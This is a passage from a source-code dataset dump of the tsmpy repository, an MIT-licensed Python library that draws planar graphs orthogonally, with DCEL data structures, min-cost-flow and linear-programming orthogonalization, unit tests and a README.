weight=multi_flowG[u][v][key]['weight'],\n )\n for node in multi_flowG:\n new_mdg.nodes[node]['demand'] = \\\n multi_flowG.nodes[node]['demand'] - \\\n get_demand(base_dict, node)\n return base_dict, new_mdg\n\n base_dict, new_mdg = split(self)\n flow_dict = nx.min_cost_flow(new_mdg)\n for u, v, key in self.edges:\n flow_dict[u][v][key] += base_dict[u][v][key]\n\n self.cost = self.cost_of_flow(flow_dict)\n return flow_dict\n\n def cost_of_flow(self, flow_dict):\n cost = 0\n for u, v, key in self.edges:\n cost += flow_dict[u][v][key] * self[u][v][key]['weight']\n return cost\n"
},
{
"alpha_fraction": 0.5823699235916138,
"alphanum_fraction": 0.5823699235916138,
"avg_line_length": 26.68000030517578,
"blob_id": "265cc78cc93b4dd12c35d5977f9b6807f423e6a3",
"content_id": "66ee0f326fca64138fc604cd2e9162d453716f42",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 692,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 25,
"path": "/tsmpy/dcel/face.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "class Face:\n def __init__(self, name):\n self.id = name\n self.inc = None # the first half-edge incident to the face from left\n self.is_external = False\n\n def __len__(self):\n return len(list(self.surround_vertices()))\n\n def __repr__(self) -> str:\n return str(self.id)\n\n def surround_faces(self): # clockwise, duplicated!!\n for he in self.surround_half_edges():\n yield he.twin.inc\n\n def surround_half_edges(self): # clockwise\n yield from self.inc.traverse()\n\n def surround_vertices(self):\n for he in self.surround_half_edges():\n yield he.ori\n\n def __hash__(self):\n return hash(self.id)\n"
},
{
"alpha_fraction": 0.5136138796806335,
"alphanum_fraction": 0.5254950523376465,
"avg_line_length": 33.23728942871094,
"blob_id": "8e6ec1bc560f36f7ce554076778088b7b1f77758",
"content_id": "29f234688f58046b73522b0090955d04131b429d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4040,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 118,
"path": "/tsmpy/tsm/utils.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from networkx import PlanarEmbedding\nfrom math import atan2\nimport networkx as nx\nimport matplotlib.patches as mpatches\nfrom matplotlib import pyplot as plt\n\n\ndef convert_pos_to_embedding(G, pos):\n \"\"\"Make sure only straight line in layout\"\"\"\n emd = PlanarEmbedding()\n for node in G:\n neigh_pos = {\n neigh: (pos[neigh][0]-pos[node][0], pos[neigh][1]-pos[node][1]) for neigh in G[node]\n }\n neighes_sorted = sorted(G.adj[node],\n key=lambda v: atan2(\n neigh_pos[v][1], neigh_pos[v][0])\n ) # counter clockwise\n last = None\n for neigh in neighes_sorted:\n emd.add_half_edge_ccw(node, neigh, last)\n last = neigh\n emd.check_structure()\n return emd\n\n\ndef number_of_cross(G, pos):\n \"\"\"\n not accurate, may be equal to actual number or double\n \"\"\"\n def is_cross(pa, pb, pc, pd):\n def xmul(v1, v2):\n return v1[0] * v2[1] - v1[1] * v2[0]\n\n def f(pa, pb, p):\n return (pa[1] - pb[1]) * (p[0] - pb[0]) - (p[1] - pb[1]) * (pa[0] - pb[0])\n\n ca = (pa[0] - pc[0], pa[1] - pc[1])\n cb = (pb[0] - pc[0], pb[1] - pc[1])\n cd = (pd[0] - pc[0], pd[1] - pc[1])\n return xmul(ca, cd) >= 0 and xmul(cd, cb) >= 0 and f(pa, pb, pc) * f(pa, pb, pd) < 0\n\n count = 0\n for a, b in G.edges:\n for c, d in G.edges:\n if a not in (c, d) and b not in (c, d):\n if is_cross(pos[a], pos[b], pos[c], pos[d]):\n count += 1\n\n return count\n\n\ndef overlap_nodes(G, pos): # not efficient\n inv_pos = {}\n for k, v in pos.items():\n v = tuple(v) # compatible with pos given by nx.spring_layout()\n inv_pos[v] = inv_pos.get(v, ()) + (k,)\n return [node for nodes in inv_pos.values() if len(nodes) > 1 for node in nodes]\n\n\ndef overlay_edges(G, pos): # not efficient\n res = set()\n for a, b in G.edges:\n (xa, ya), (xb, yb) = pos[a], pos[b]\n for c, d in G.edges:\n (xc, yc), (xd, yd) = pos[c], pos[d]\n if (a, b) != (c, d):\n if xa == xb == xc == xd:\n if min(ya, yb) >= max(yc, yd) or max(ya, yb) <= min(yc, yd):\n continue\n res.add((a, b))\n res.add((c, d))\n if ya == yb == yc == yd:\n if min(xa, xb) >= max(xc, xd) or max(xa, xb) <= min(xc, xd):\n continue\n res.add((a, b))\n res.add((c, d))\n return list(res)\n\n\ndef draw_overlay(G, pos, is_bendnode):\n \"\"\"Draw graph and highlight bendnodes, overlay nodes and edges\"\"\"\n plt.axis('off')\n # draw edge first, otherwise edge may not show in plt result\n # draw all edges\n nx.draw_networkx_edges(G, pos)\n # draw all nodes\n nx.draw_networkx_nodes(G, pos, nodelist=[node for node in G.nodes if not is_bendnode(\n node)], node_color='white', node_side=15)\n\n draw_nodes_kwds = {'G': G, 'pos': pos, 'node_size': 15}\n\n bend_nodelist = [node for node in G.nodes if is_bendnode(node)]\n # draw bend nodes if exist\n if bend_nodelist:\n nx.draw_networkx_nodes(\n nodelist=bend_nodelist, node_color='grey', **draw_nodes_kwds)\n\n # draw overlap nodes if exist\n overlap_nodelist = overlap_nodes(G, pos)\n if overlap_nodelist:\n nx.draw_networkx_nodes(\n nodelist=overlap_nodelist, node_color=\"red\", **draw_nodes_kwds)\n\n # draw overlay edges if exist\n overlay_edgelist = overlay_edges(G, pos)\n if overlay_edgelist:\n nx.draw_networkx_edges(\n G, pos, edgelist=overlay_edgelist, edge_color='red')\n\n # draw patches if exist\n patches = []\n if overlap_nodelist or overlay_edgelist:\n patches.append(mpatches.Patch(color='red', label='overlay'))\n if bend_nodelist:\n patches.append(mpatches.Patch(color='grey', label='bend node'))\n if patches:\n plt.legend(handles=patches)\n"
},
{
"alpha_fraction": 0.6078697443008423,
"alphanum_fraction": 0.614654004573822,
"avg_line_length": 24.413793563842773,
"blob_id": "4dd3a68ee5fe0c0cb9d778169e95168f5b375753",
"content_id": "7bea475fa04d905ea48a24375c1b355a4c5d3b13",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 737,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 29,
"path": "/setup.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\nimport pathlib\n\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / \"README.md\").read_text()\n\nsetup(\n name=\"tsmpy\",\n version=\"0.9.3\",\n author=\"uknfire\",\n author_email=\"[email protected]\",\n description=\"An orthogonal layout algorithm, using TSM approach\",\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/uknfire/tsmpy\",\n project_urls={\n \"Source\": \"https://github.com/uknfire/tsmpy\",\n },\n license=\"MIT\",\n packages=find_packages(),\n keywords=[\n \"Graph Drawing\",\n \"orthogonal\",\n \"layout\",\n \"graph\",\n ],\n install_requires=[\"networkx\", \"pulp\"],\n python_requires=\">=3.6\",\n)\n"
},
{
"alpha_fraction": 0.5140562057495117,
"alphanum_fraction": 0.5140562057495117,
"avg_line_length": 23.09677505493164,
"blob_id": "1ecd9fadb9d49ed1543138c447d0e2b48ac9bfa1",
"content_id": "12543e9bd5e1ef445b2431ca1b0f6f7383f51393",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 747,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 31,
"path": "/tsmpy/dcel/halfedge.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "class HalfEdge:\n def __init__(self, name):\n self.id = name\n self.inc = None # the incident face at its right hand\n self.twin = None\n self.ori = None\n self.prev = None\n self.succ = None\n\n def get_points(self):\n return self.ori.id, self.twin.ori.id\n\n def set(self, twin, ori, prev, succ, inc):\n self.twin = twin\n self.ori = ori\n self.prev = prev\n self.succ = succ\n self.inc = inc\n\n def traverse(self):\n yield self\n he = self.succ\n while he is not self:\n yield he\n he = he.succ\n\n def __repr__(self) -> str:\n return f'{self.ori}->{self.twin.ori}'\n\n def __hash__(self):\n return hash(self.id)\n"
},
{
"alpha_fraction": 0.5173543095588684,
"alphanum_fraction": 0.5221567153930664,
"avg_line_length": 37.49580001831055,
"blob_id": "60aed33c13fbb3129196abe27094d4bd6902ce72",
"content_id": "7c645a21ed3a6d4ea132ecd870cb2ec38123c128",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4581,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 119,
"path": "/tsmpy/tsm/orthogonalization.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "import pulp\nfrom collections import defaultdict\nfrom .flownet import Flow_net\n\nclass Orthogonalization:\n '''works on a planar embedding, changes shape of the graph.\n '''\n\n def __init__(self, planar, uselp=False):\n self.planar = planar\n\n self.flow_network = self.face_determination()\n if not uselp:\n self.flow_dict = self.tamassia_orthogonalization()\n else:\n self.flow_dict = self.lp_solve()\n\n def face_determination(self):\n flow_network = Flow_net()\n\n for vertex in self.planar.dcel.vertices.values():\n flow_network.add_v(vertex.id)\n\n for face in self.planar.dcel.faces.values():\n flow_network.add_f(face.id, len(\n face), face.is_external)\n\n for vertex in self.planar.dcel.vertices.values():\n for he in vertex.surround_half_edges():\n flow_network.add_v2f(vertex.id, he.inc.id, he.id)\n\n for he in self.planar.dcel.half_edges.values():\n flow_network.add_f2f(he.twin.inc.id, he.inc.id, he.id) # lf -> rf\n\n return flow_network\n\n def tamassia_orthogonalization(self):\n return self.flow_network.min_cost_flow()\n\n def lp_solve(self, weight_of_corner=1):\n '''\n Use linear programming to solve min cost flow problem, make it possible to define constrains.\n\n Alert: pulp will automatically transfer node's name into str and repalce some special\n chars into '_', and will throw a error if there are variables' name duplicated.\n '''\n\n\n prob = pulp.LpProblem() # minimize\n\n var_dict = {}\n varname2tuple = {}\n for u, v, he_id in self.flow_network.edges:\n var_dict[u, v, he_id] = pulp.LpVariable(\n f'{u}{v}{he_id}',\n self.flow_network[u][v][he_id]['lowerbound'],\n self.flow_network[u][v][he_id]['capacity'],\n pulp.LpInteger\n )\n # pulp will replace ' ' with '_' automatically\n varname2tuple[f'{u}{v}{he_id}'.replace(' ', \"_\")] = (u, v, he_id)\n\n objs = []\n for he in self.planar.dcel.half_edges.values():\n lf, rf = he.twin.inc.id, he.inc.id\n objs.append(\n self.flow_network[lf][rf][he.id]['weight'] *\n var_dict[lf, rf, he.id]\n )\n\n # bend points' cost\n if weight_of_corner != 0:\n for v in self.planar.G:\n if self.planar.G.degree(v) == 2:\n (f1, he1_id), (f2, he2_id) = [(f, key)\n for f, keys in self.flow_network.adj[v].items()\n for key in keys]\n x = var_dict[v, f1, he1_id]\n y = var_dict[v, f2, he2_id]\n p = pulp.LpVariable(\n x.name + \"temp\", None, None, pulp.LpInteger)\n prob.addConstraint(x - y <= p)\n prob.addConstraint(y - x <= p)\n objs.append(weight_of_corner * p)\n\n prob += pulp.lpSum(objs) # number of bends in graph\n\n for f in self.planar.dcel.faces:\n prob += self.flow_network.nodes[f]['demand'] == pulp.lpSum(\n [var_dict[v, f, he_id] for v, _, he_id in self.flow_network.in_edges(f, keys=True)])\n for v in self.planar.G:\n prob += -self.flow_network.nodes[v]['demand'] == pulp.lpSum(\n [var_dict[v, f, he_id] for _, f, he_id in\n self.flow_network.out_edges(v, keys=True)]\n )\n\n state = prob.solve()\n res = defaultdict(lambda: defaultdict(dict))\n if state == 1: # update flow_dict\n self.flow_network.cost = pulp.value(prob.objective)\n for var in prob.variables():\n if var.name in varname2tuple:\n u, v, he_id = varname2tuple[var.name]\n res[u][v][he_id] = int(var.varValue)\n else:\n raise Exception(\"Problem can't be solved by linear programming\")\n return res\n\n\n # Only for validation\n def number_of_corners(self):\n count_right_angle = 0\n for node in self.planar.G:\n if self.planar.G.degree(node) == 2:\n for f, he_id in [(f, key) for f, keys in self.flow_network.adj[node].items()\n for key in keys]:\n if self.flow_dict[node][f][he_id] == 1:\n count_right_angle += 1\n return count_right_angle + self.flow_network.cost\n"
},
{
"alpha_fraction": 0.37617066502571106,
"alphanum_fraction": 0.5591397881507874,
"avg_line_length": 42.35384750366211,
"blob_id": "af9bf9952f36293869b75b5bba344ad894aa914e",
"content_id": "849c6b7da7127754bbbc2712dedac7c8bf155802",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5770,
"license_type": "permissive",
"max_line_length": 591,
"num_lines": 130,
"path": "/test.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "import networkx as nx\r\nfrom tsmpy import TSM\r\nfrom matplotlib import pyplot as plt\r\nimport unittest\r\n\r\n\r\nclass TestRefine(unittest.TestCase):\r\n def test_convex(self): # 凸\r\n e = [(i, i + 1) for i in range(7)] + [(7, 0)]\r\n G = nx.Graph(e)\r\n pos = {0: (0, 0), 1: (0, 1), 2: (1, 1), 3: (1, 2),\r\n 4: (2, 2), 5: (2, 1), 6: (3, 1), 7: (3, 0)}\r\n\r\n tsm = TSM(G, pos)\r\n tsm.display()\r\n plt.savefig(\"test/outputs/convex.svg\")\r\n plt.close()\r\n\r\n def test_cross(self): # 十\r\n e = [(i, i + 1) for i in range(11)] + [(11, 0)]\r\n G = nx.Graph(e)\r\n pos = {0: (0, 0), 1: (0, 1), 2: (1, 1), 3: (1, 2),\r\n 4: (2, 2), 5: (2, 1), 6: (3, 1), 7: (3, 0),\r\n 8: (2, 0), 9: (2, -1), 10: (1, -1), 11: (1, 0),\r\n }\r\n tsm = TSM(G, pos)\r\n tsm.display()\r\n plt.savefig(\"test/outputs/cross.svg\")\r\n plt.close()\r\n\r\nclass TestGML(unittest.TestCase):\r\n @staticmethod\r\n def _test(filename, uselp):\r\n G = nx.Graph(nx.read_gml(filename))\r\n pos = {node: eval(node) for node in G}\r\n\r\n # shortify node name\r\n node_dict = {v: i for i, v in enumerate(pos)}\r\n G = nx.Graph([node_dict[u], node_dict[v]] for u, v in G.edges)\r\n pos = {node_dict[k]: v for k, v in pos.items()}\r\n\r\n tsm = TSM(G, pos, uselp=uselp)\r\n tsm.display()\r\n plt.savefig(filename.replace(\r\n \"inputs\", \"outputs\").replace(\".gml\", f\".{'lp' if uselp else 'nolp'}.svg\"))\r\n plt.close()\r\n\r\n\r\n def test_4_nocut(self): # no cut edge\r\n TestGML._test(\"test/inputs/case4.gml\", False)\r\n TestGML._test(\"test/inputs/case4.gml\", True)\r\n\r\n def test_2_nocut(self): # no cut edge\r\n TestGML._test(\"test/inputs/case2.gml\", False)\r\n TestGML._test(\"test/inputs/case2.gml\", True)\r\n\r\n def test_5_2cut_external(self): # a small graph, has two external cut-edges\r\n TestGML._test(\"test/inputs/case5.gml\", False)\r\n TestGML._test(\"test/inputs/case5.gml\", True)\r\n\r\n def test_7_1cut_internal(self): # a small graph, has one internal cut-edge\r\n TestGML._test(\"test/inputs/case7.gml\", False)\r\n TestGML._test(\"test/inputs/case7.gml\", True)\r\n\r\n def test_8_cut_external(self): # external face has cut-edges, simpler that case1\r\n TestGML._test(\"test/inputs/case8.gml\", False)\r\n TestGML._test(\"test/inputs/case8.gml\", True)\r\n\r\n def test_1_cut_external(self): # external face has cut-edges\r\n TestGML._test(\"test/inputs/case1.gml\", False)\r\n TestGML._test(\"test/inputs/case1.gml\", True)\r\n\r\n def test_6_cut_internal(self): # internal face has cut-edges\r\n TestGML._test(\"test/inputs/case6.gml\", False)\r\n TestGML._test(\"test/inputs/case6.gml\", True)\r\n\r\n def test_3_cut_both(self): # inner face has cut-edges (most difficult\r\n TestGML._test(\"test/inputs/case3.gml\", False)\r\n TestGML._test(\"test/inputs/case3.gml\", True)\r\n\r\n\r\nclass TestBend(unittest.TestCase):\r\n def test_bend(self):\r\n pos = {'0': [233.40717895650255, 245.2668161593756], '1': [197.16129504244714, 30], '2': [141.70696162531476, 231.32493034071877], '3': [60.65624829590422, 113.49167630171439], '4': [108.35736160598731, 76.64552177189921], '5': [87.0130296182083, 188.10311014236993], '6': [319.33416955603843, 259.2393822803765], '7': [30, 277.38385767958584], '8': [98.92200205792096, 284.1742280192017], '9': [179.4743438581056, 319.91589873409737], '10': [287.1444006787124, 72.41331541473198], '11': [31.12464635584422, 32.898914774980994], '12': [158.93331495445887, 99.4944443930458], '13': [\r\n 139.43918552954983, 153.80882320636442], '14': [369.5136536406337, 104.14142146557003], '15': [290.598502710234, 165.863033803461], '16': [211.4553136831521, 174.1784364618411], '17': [228.30221376063673, 102.81798218614415], '18': [37.389296631515435, 206.8668863010132], '19': [387.48004971189835, 189.04480920874767], 'cdnode1': [70.62903289986328, 215.04295834065474], 'cdnode2': [91.39401162703457, 219.91146037454223], 'cdnode3': [98.17352514597789, 132.9352577570292], 'cdnode4': [120.30579006619145, 105.56723017608186], 'cdnode5': [102.94092788747736, 108.040441996923]}\r\n\r\n\r\n edges = [['0', '2'], ['0', '6'], ['0', '15'], ['0', '9'], ['1', '4'], ['1', '17'], ['1', '10'], ['2', '16'], ['2', '13'], ['3', '5'], ['3', '11'], ['4', '11'], ['6', '19'], ['7', '18'], ['8', '9'], ['10', '15'], ['10', '14'], ['12', '16'], ['14', '19'], ['15', '17'], ['cdnode1', '18'], [\r\n '5', 'cdnode1'], ['cdnode1', '7'], ['2', 'cdnode2'], ['cdnode2', 'cdnode1'], ['5', 'cdnode2'], ['cdnode2', '8'], ['3', 'cdnode3'], ['cdnode3', '13'], ['cdnode3', '5'], ['cdnode4', '12'], ['4', 'cdnode4'], ['cdnode4', '13'], ['3', 'cdnode5'], ['cdnode5', 'cdnode4'], ['4', 'cdnode5'], ['cdnode5', 'cdnode3']]\r\n\r\n G = nx.Graph(edges)\r\n tsm = TSM(G, pos)\r\n tsm.display()\r\n plt.savefig(f\"test/outputs/bend.svg\")\r\n plt.close()\r\n\r\nclass TestGrid(unittest.TestCase):\r\n def _test_grid(i, j):\r\n G = nx.grid_2d_graph(i, j)\r\n pos = {node: node for node in G}\r\n tsm = TSM(G, pos)\r\n tsm.display()\r\n plt.savefig(f\"test/outputs/grid_{i}x{j}.svg\")\r\n plt.close()\r\n\r\n def test_2x1(self):\r\n TestGrid._test_grid(2, 1)\r\n\r\n def test_1x5(self):\r\n TestGrid._test_grid(1, 5)\r\n\r\n def test_1x2(self):\r\n TestGrid._test_grid(1, 2)\r\n\r\n def test_5x5(self):\r\n TestGrid._test_grid(5, 5)\r\n\r\n def test_3x3(self):\r\n TestGrid._test_grid(3, 3)\r\n\r\n def test_2x2(self):\r\n TestGrid._test_grid(2, 2)\r\n\r\n def test_1x99(self):\r\n TestGrid._test_grid(1, 99)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main(verbosity=3, exit=False)\r\n"
},
{
"alpha_fraction": 0.782608687877655,
"alphanum_fraction": 0.782608687877655,
"avg_line_length": 22,
"blob_id": "f3d52cf2cbc66e1e33807021f646b7f9be0f01c6",
"content_id": "54f20bd03a023c684924a40c000e7c92191b4b88",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 1,
"path": "/tsmpy/dcel/__init__.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from .dcel import Dcel\n"
},
{
"alpha_fraction": 0.4835532009601593,
"alphanum_fraction": 0.4937554895877838,
"avg_line_length": 33.75471878051758,
"blob_id": "e9112202e60bf578856d0f799846568f6b6420bc",
"content_id": "6249ea3ddfaf212daf912cdd370a36dc1fd41dfe",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5685,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 159,
"path": "/tsmpy/dcel/dcel.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "\"\"\"DCEL means Doubly connected edge list(also known as half-edge data structure).\r\nIt is a data structure to represent an embedding of a planar graph in the plane\r\n\"\"\"\r\nfrom .face import Face\r\nfrom .halfedge import HalfEdge\r\nfrom .vertex import Vertex\r\n\r\n\r\nclass Dcel:\r\n \"\"\"\r\n Build double connected edge list for a connected planar graph.\r\n Require the number of nodes greater than 1.\r\n Naming vertice with node name.\r\n Naming halfedge with (u, v).\r\n Nmming face with ('face', %d).\r\n \"\"\"\r\n\r\n def __init__(self, G, embedding):\r\n self.vertices = {}\r\n self.half_edges = {}\r\n self.faces = {}\r\n self.ext_face = None\r\n\r\n for node in G.nodes:\r\n self.vertices[node] = Vertex(node)\r\n\r\n for u, v in G.edges:\r\n he1, he2 = HalfEdge((u, v)), HalfEdge((v, u))\r\n self.half_edges[he1.id] = he1\r\n self.half_edges[he2.id] = he2\r\n he1.twin = he2\r\n he1.ori = self.vertices[u]\r\n self.vertices[u].inc = he1\r\n\r\n he2.twin = he1\r\n he2.ori = self.vertices[v]\r\n self.vertices[v].inc = he2\r\n\r\n for he in self.half_edges.values():\r\n u, v = he.get_points()\r\n he.succ = self.half_edges[embedding.next_face_half_edge(u, v)]\r\n he.succ.prev = he\r\n\r\n for he in self.half_edges.values():\r\n if not he.inc:\r\n face_id = (\"face\", len(self.faces))\r\n face = Face(face_id)\r\n face.inc = he\r\n self.faces[face_id] = face\r\n\r\n nodes_id = embedding.traverse_face(*he.get_points())\r\n for v1_id, v2_id in zip(nodes_id, nodes_id[1:]+nodes_id[:1]):\r\n other = self.half_edges[v1_id, v2_id]\r\n assert not other.inc\r\n other.inc = face\r\n\r\n if not self.faces:\r\n self.faces[('face', 0)] = Face(('face', 0))\r\n\r\n def add_node_between(self, u, node_name, v):\r\n def insert_node(u, v, mi):\r\n he = self.half_edges.pop((u, v))\r\n he1 = HalfEdge((u, mi.id))\r\n he2 = HalfEdge((mi.id, v))\r\n mi.inc = he2\r\n # update half_edges\r\n self.half_edges[u, mi.id] = he1\r\n self.half_edges[mi.id, v] = he2\r\n he1.set(None, he.ori, he.prev, he2, he.inc)\r\n he2.set(None, mi, he1, he.succ, he.inc)\r\n he1.prev.succ = he1\r\n he2.succ.prev = he2\r\n # update face\r\n if he.inc.inc is he:\r\n he.inc.inc = he1\r\n # update vertex\r\n if he.ori.inc is he:\r\n he.ori.inc = he1\r\n\r\n # update vertices\r\n mi = Vertex(node_name)\r\n self.vertices[node_name] = mi\r\n # insert\r\n insert_node(u, v, mi)\r\n insert_node(v, u, mi)\r\n for v1, v2 in ((u, mi.id), (mi.id, v)):\r\n self.half_edges[v1, v2].twin = self.half_edges[v2, v1]\r\n self.half_edges[v2, v1].twin = self.half_edges[v1, v2]\r\n\r\n def connect(self, face: Face, u, v, halfedge_side, side_uv): # u, v in same face\r\n def insert_halfedge(u, v, f, prev_he, succ_he):\r\n he = HalfEdge((u, v))\r\n self.half_edges[u, v] = he\r\n f.inc = he\r\n he.set(None, self.vertices[u], prev_he, succ_he, f)\r\n prev_he.succ = he\r\n succ_he.prev = he\r\n self.faces[f.id] = f\r\n for h in he.traverse():\r\n h.inc = f\r\n\r\n # It's true only if G is connected.\r\n face_l = Face(('face', *face.id[1:], 'l'))\r\n face_r = Face(('face', *face.id[1:], 'r'))\r\n\r\n if face.is_external:\r\n face_r.is_external = True\r\n self.ext_face = face_r\r\n\r\n hes_u = [he for he in self.vertices[u].surround_half_edges()\r\n if he.inc == face]\r\n hes_v = [he for he in self.vertices[v].surround_half_edges()\r\n if he.inc == face]\r\n\r\n # It's very important to select the right halfedge, depending on its side\r\n def select(outgoing_side, hes):\r\n if len(hes) == 1:\r\n return hes[0]\r\n\r\n side_dict = {halfedge_side[he]: he for he in hes}\r\n for side in [(outgoing_side + i) % 4 for i in [3, 2, 1]]:\r\n if side in side_dict:\r\n return side_dict[side]\r\n\r\n he_u = select(side_uv, hes_u)\r\n he_v = select((side_uv + 2) % 4, hes_v)\r\n\r\n prev_uv = he_u.prev\r\n succ_uv = he_v\r\n prev_vu = he_v.prev\r\n succ_vu = he_u\r\n\r\n insert_halfedge(u, v, face_r, prev_uv, succ_uv)\r\n insert_halfedge(v, u, face_l, prev_vu, succ_vu)\r\n self.half_edges[u, v].twin = self.half_edges[v, u]\r\n self.half_edges[v, u].twin = self.half_edges[u, v]\r\n self.faces.pop(face.id)\r\n\r\n def connect_diff(self, face: Face, u, v):\r\n assert type(u) != Vertex\r\n assert type(v) != Vertex\r\n\r\n def insert_halfedge(u, v, f, prev_he, succ_he):\r\n he = HalfEdge((u, v))\r\n self.half_edges[u, v] = he\r\n he.set(None, self.vertices[u], prev_he, succ_he, f)\r\n prev_he.succ = he\r\n succ_he.prev = he\r\n he_u = self.vertices[u].get_half_edge(face)\r\n he_v = self.vertices[v].get_half_edge(face)\r\n prev_uv = he_u.prev\r\n succ_uv = he_v\r\n prev_vu = he_v.prev\r\n succ_vu = he_u\r\n\r\n insert_halfedge(u, v, face, prev_uv, succ_uv)\r\n insert_halfedge(v, u, face, prev_vu, succ_vu)\r\n self.half_edges[u, v].twin = self.half_edges[v, u]\r\n self.half_edges[v, u].twin = self.half_edges[u, v]\r\n"
},
{
"alpha_fraction": 0.774193525314331,
"alphanum_fraction": 0.774193525314331,
"avg_line_length": 61,
"blob_id": "d5ff544587fbe5adfceb687bc25c67ecc46dec38",
"content_id": "d4ed7f150a4c3b26c46bb9dd5b42f066fe360435",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 62,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 1,
"path": "/tsmpy/__init__.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from .tsm.tsm import TSM, ortho_layout, is_bendnode, precheck\n"
},
{
"alpha_fraction": 0.5450819730758667,
"alphanum_fraction": 0.5450819730758667,
"avg_line_length": 26.11111068725586,
"blob_id": "3ba2045660cc6d5973de9cb77b0ae8fb11ad55f0",
"content_id": "8c6f122f3d8eeefdef605c37cbb598c1470f1d12",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 732,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 27,
"path": "/tsmpy/dcel/vertex.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "class Vertex:\n def __init__(self, name):\n self.id = name\n self.inc = None # 'the first outgoing incident half-edge'\n\n def surround_faces(self): # clockwise, duplicated\n for he in self.surround_half_edges():\n yield he.inc\n\n def surround_half_edges(self): # clockwise\n yield self.inc\n he = self.inc.prev.twin\n while he is not self.inc:\n yield he\n he = he.prev.twin\n\n def get_half_edge(self, face):\n for he in self.surround_half_edges():\n if he.inc is face:\n return he\n raise Exception(\"not find\")\n\n def __repr__(self):\n return f'{self.id}'\n\n def __hash__(self):\n return hash(self.id)\n"
},
{
"alpha_fraction": 0.7184934616088867,
"alphanum_fraction": 0.7440849542617798,
"avg_line_length": 26.263158798217773,
"blob_id": "a75ad904be4c0410d4d4b5ff1614e77b05980c82",
"content_id": "be70043f830b8616a83beb0b53a2788491da4091",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2071,
"license_type": "permissive",
"max_line_length": 209,
"num_lines": 76,
"path": "/README.md",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "# Introduction\n\nAn implementation of orthogonal drawing algorithm in Python\n\nMain idea comes from [A Generic Framework for the Topology-Shape-Metrics Based Layout](https://rtsys.informatik.uni-kiel.de/~biblio/downloads/theses/pkl-mt.pdf)\n\n# How to run code\n## Install requirements\n```bash\npip install -r requirements.txt\n```\n## Usage\n```Python\n# in root dir\nimport networkx as nx\nfrom tsmpy import TSM\nfrom matplotlib import pyplot as plt\n\nG = nx.Graph(nx.read_gml(\"test/inputs/case2.gml\"))\n\n# initial layout, it will be converted to an embedding\npos = {node: eval(node) for node in G}\n\n# pos is an optional, if pos is None, embedding will be given by nx.check_planarity\n\n# use linear programming to solve minimum cost flow program\ntsm = TSM(G, pos)\n\n# or use nx.min_cost_flow to solve minimum cost flow program\n# it is faster but produces worse result\n# tsm = TSM(G, pos, uselp=False)\n\ntsm.display()\nplt.savefig(\"test/outputs/case2.lp.svg\")\nplt.close()\n```\n\n## Run test\n```bash\n# show help\npython test.py -h\n\n# run all tests\npython test.py\n\n# run all tests in TestGML\npython test.py TestGML\n```\n\n# Example\n|case1|case2|\n|---|---|\n|||\n\n|bend case|grid case|\n|---|---|\n|||\n\n# Playground\nTry editing original case2 graph with [yed](https://www.yworks.com/yed-live/?file=https://gist.githubusercontent.com/uknfire/1a6782b35d066d6e59e00ed8dc0bb795/raw/eaee6eee89c48efa1c234f31fd8f9c32d237ce1e/case2)\n# Requirements for input graph\n* Planar\n* Connected\n* Max node degree is no more than 4\n* No selfloop\n\n# Features\n* Using linear programing to solve minimum-cost flow problem, to reduce number of bends\n\n\n# TODO\n- [ ] Cleaner code\n- [ ] More comments\n- [x] Fix overlay\n- [ ] Support node degree > 4\n- [x] Support cut-edges"
},
{
"alpha_fraction": 0.46285080909729004,
"alphanum_fraction": 0.4722304344177246,
"avg_line_length": 39.90634536743164,
"blob_id": "77177251e9cc257b45af0117bc245dc22cffdfa6",
"content_id": "9f83d88a697cea7969022462ccf6935a1450a15c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13540,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 331,
"path": "/tsmpy/tsm/compaction.py",
